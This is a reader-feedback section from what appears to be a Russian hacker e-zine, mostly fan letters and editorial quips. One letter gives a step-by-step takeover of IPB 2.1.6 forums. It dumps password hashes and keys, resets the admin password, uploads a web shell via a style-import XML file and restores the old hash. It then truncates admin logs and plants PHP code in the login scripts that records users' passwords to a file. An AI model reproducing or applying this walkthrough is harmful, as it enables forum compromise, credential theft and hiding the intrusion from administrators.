по славной традиции, немного фидбека к нам оказывается пришло =)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: qw rt <[email protected]>
Тема: ВАЖНЫЙ ВОПРОС
Прив8 #дефейсд. Слухай скажи вы собираетесь 10ый нумбер делать #деф? У меня
просто материал есть хотел к вам кинуть, можно попробовать? ЖДУ ОТВЕТАА!!!!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ не дождались, на будущее - шли и не спрашивай. если будет номер то твой крео
туда вполне может попасть. ]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: Tark <[email protected]>
Тема: 9 номер
Грустный вышел номер.. А жаль.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ не смешно, зато про жизнь ) ]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: Д Д<[email protected]>
Тема: V0T!
Ели меня кто-то слышит кроме меня самого! Мужики ну и депресуху вы
нагнали в 9-zine в статье 0x07 >< choose life -> я увидел себя Ж)
да так оно и есть, все умерло все летит в 3.14зду, но не кажется вам
что после смерти чего то должно последовать возрождение на следующем
етапе еволюции? Много людей котрые просто пиздят ето следствие
вливания масс в темы которые они не понимают, но ведь дело делают лишь
единицы и вы относитесь к последним представителям настоящего
Undegraunda! А номер вобщем мне понравился как раз под настроение
полный депреСССр.
з.ы. ргр пользоваться могу пишу через веб
дайте поковырять что нить и как буквы писать вроде еще не
разучился...
надеюсь ето письмо не ушло в /dev/nul а вобщем какая разница
3.14здец я кончил.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ присылай если что-то будет, никуда мы пока не денемся ]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: nekd0 <[email protected]>
Тема: zine
Здравствуйте, d3f4c3d.
спасибо за 9ый выпуск,ахуенный.стафф тоже ахуенный.отлично
потрудились.
отдельное спасибо за
04_static_lib_calls_hook
06_chose_life
07_death_industry
продолжайте в том же духе.
--
С уважением,
nekd0 mailto:[email protected]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ всегда пожалуйста ) ]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: <[email protected]>
Тема: ???
fds не умер. 9 issue - хорошая работа. Завязывайте с медведами и преведами.
btw, hihi ))
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ хыхы, ждём новых FDS номеров ]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: nekd0 <[email protected]>
Тема: ???
на милворме до этого допёрли только недавно, и то, никто не догадался
обратно пасс админу поменять. так что впринципе это уже не приват. хотя
почитать интересно. скажите что думаете, я доработаю тут всё, пару кодов
напишу и заебись должно получиться.
-------------------------------------------------------------------------------
альтернативный способ без использования чужой сессии.
находим форум с ipb бажным. чтобы получить права админа нам надо :
1) получить и записать куданить данные из следующих колонок базы.
используется бага в 2.1.6. сплоит от рст.
[shot 1]
TEST FORUM ... FORUM VULNERABLE
MEMBER_LOGIN_KEY : 83666dcd7d57f61f94a7a57b674f405b (ibf_members ->
member_login_key)
CONVERGE_PASS_HASH : b53fa8d06dff6497e51691055bb8044e
(ibf_members_converge -> converge_pass_hash)
CONVERGE_PASS_SALT : "C^04 (ibf_members_converge -> converge_pass_salt)
[/shot 1]
запомнили всё это. приступаем к следующему шагу. смена пасса на админку
и заливание шелла.
для этого идём сюда http://localhost/index.php?act=Reg&CODE=10 .
востаннавливаем.
суть в том, что на мыло высылается код активации, который надо будет
потом ввести,
и соответственно этот код лежит и в БД. мы его оттуда аккуратно берём.
лежит в колонке vid записи ibf_validating.
(немного переписал сплоит)
[shot 2]
TEST FORUM ... FORUM VULNERABLE
VALIDATING_KEY : 86ce9be9800111e7b52c0020480e52ec (вот этот ключ)
CONVERGE_PASS_HASH : b53fa8d06dff6497e51691055bb8044e
CONVERGE_PASS_SALT : "C^04
[/shot 2]
заходим сюда - http://127.0.0.1/index.php?act=Reg& … stpassform
палево только в том, что и на мыло админу эта хня отправиться тоже)
но это всё ерунда) пасс изменён. соответственно теперь мы можем зайти в
админку
с новым пассом. делаем shot 1 ещё раз.
[shot 1/2]
TEST FORUM ... FORUM VULNERABLE
MEMBER_LOGIN_KEY : 83666dcd7d57f61f94a7a57b674f405b
CONVERGE_PASS_HASH : e5c3da3791b26207d8e683cb245cb253
CONVERGE_PASS_SALT : "C^04
[/shot 1/2]
как мы видим login_key и pass_salt не изменились и это круто) меньше
менять потом придёца)
теперь надо залить шелл. это делается через достаточно корявый метод.
Идём на вкладку
Внешний Вид -> Импорт/Экспорт Стилей. Экспортируем например стиль
изображений.
Сейчас будем закачивать файлы через импорт изображений. Скачали мы
значит этот
стиль. Он представляет собой xml файл, в котором находиться контент
картинок закодированный
в base64. Следовательно нам надо закодировать и свой файл. Кодируем. Я
кодирую rst shell.
Вот что у меня получилось. Это уже нужно добавить в xml файл и закачать
его.
<file>
<filename>phorum.php</filename>
<content>
[здесь конент файла]
</content>
<path></path>
<binary>0</binary>
</file>
Теперь импортируем наш стиль. Импортировали. Теперь наш шелл можно найти
по адресу
http://127.0.0.1/style_images/2/phorum.php .
Хехе)) Теперь надо поменять пасс админу. То есть загнать в
converge_pass_hash
значение которое было раньше и всё тип топ).
UPDATE `ibf_members_converge` SET `converge_pass_hash` =
'b53fa8d06dff6497e51691055bb8044e' WHERE `converge_id` =1 LIMIT 1 ;
чистим логи админки :
truncate table `ibf_admin_sessions`;
truncate table `ibf_sessions`;
truncate table `ibf_admin_logs`;
всё гуд.
теперь надо оставить бекдор маленький. типа подменить коекакие файлы.
так. значит добавляем в sources/action_admin/login.php и
sources/action_public/login.php
строчку навроде этой
$real_is=fopen('style_images/1/logger.txt','a-');
$check_1=$this->ipsclass->input['UserName']; //action_public
$check_2=$this->ipsclass->input['PassWord'];
$check_1=$this->ipsclass->input['username']; //action_admin
$check_2=$this->ipsclass->input['password'];
$string=base64_encode("$check_1:$check_2");
fputs($real_is,$string);
fputs($real_is,"\n");
fclose($real_is);
и уже гут.
вот такие вот наброски по поводу `ipb 2.1.6 или как залить шелл, и т.д.`
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ ipb 2.1.6 немного старая версия =) да и бага не новая. Хотя кому-то может и
пригодится. Так или инчае спасибо за старания ) ]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: nekd0 <[email protected]>
Тема: зайн "Ржавая Сеть"
rusty.mrtech.ru - интереснейший киберпанк зайн, в 2к6 вышел его 6ой
номер, оцените, зайн ахуительный.
--
nekd0.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ аминь =) ]